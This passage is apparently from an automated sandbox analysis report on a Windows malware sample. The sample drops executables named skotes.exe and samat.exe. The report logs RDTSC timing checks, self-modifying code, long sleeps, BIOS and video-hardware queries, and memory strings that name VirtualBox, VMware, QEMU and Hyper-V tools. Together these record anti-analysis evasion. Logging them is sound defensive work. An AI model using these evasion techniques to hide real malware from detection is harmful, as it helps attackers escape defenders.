                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0357 second address: 52B03BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8481503878h 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test edx, 61000000h 0x00000015 jmp 00007F848150386Ah 0x0000001a jne 00007F84F3171B65h 0x00000020 jmp 00007F8481503870h 0x00000025 test byte ptr [esi+48h], 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8481503877h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0831 second address: 52A0880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, A029h 0x00000011 pushfd 0x00000012 jmp 00007F8480743936h 0x00000017 sub ecx, 199D79F8h 0x0000001d jmp 00007F848074392Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0880 second address: 52A0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0886 second address: 52A088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A088A second address: 52A08D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F848150386Bh 0x00000015 add ax, EA6Eh 0x0000001a jmp 00007F8481503879h 0x0000001f popfd 0x00000020 mov eax, 2D75BFF7h 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A08D0 second address: 52A0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, 2E2E7239h 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 jmp 00007F8480743932h 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848074392Ah 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0911 second address: 52A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0915 second address: 52A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A091B second address: 52A0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0921 second address: 52A0948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0948 second address: 52A096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F848150386Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A096A second address: 52A0986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 72E96C instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E281D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 966F64 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 80E96C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 9C281D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: A46F64 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053203B3 rdtsc 0_2_053203B3
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 428Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1412Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 517Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2460Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-17370
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeAPI coverage: 1.9 %
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5264Thread sleep time: -60030s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352Thread sleep count: 428 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352Thread sleep time: -856428s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084Thread sleep count: 304 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084Thread sleep time: -9120000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732Thread sleep count: 1412 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732Thread sleep time: -2825412s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5736Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476Thread sleep count: 517 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476Thread sleep time: -1034517s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528Thread sleep count: 2460 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528Thread sleep time: -4922460s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3636Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7436Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7204Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose,7_2_00007FF7E12C9280
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7E12C83C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7E12E1874
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose,8_2_00007FF7E12C9280
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF7E12C83C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF7E12E1874
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF1230 GetSystemInfo,8_2_00007FF8B7FF1230
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
                    Source: samat.exe, 00000007.00000003.2990422238.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwaretray.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dVMware SVGA 3D
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray.exe
                    Source: samat.exe, 00000008.00000002.4559869878.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4548533682.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmtoolsd.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxservice.exe
                    Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dro.kernel.qemu
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Video
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmsrvc.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dMicrosoft Hyper-V Video
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareuser.exe
                    Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ro.kernel.qemu
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
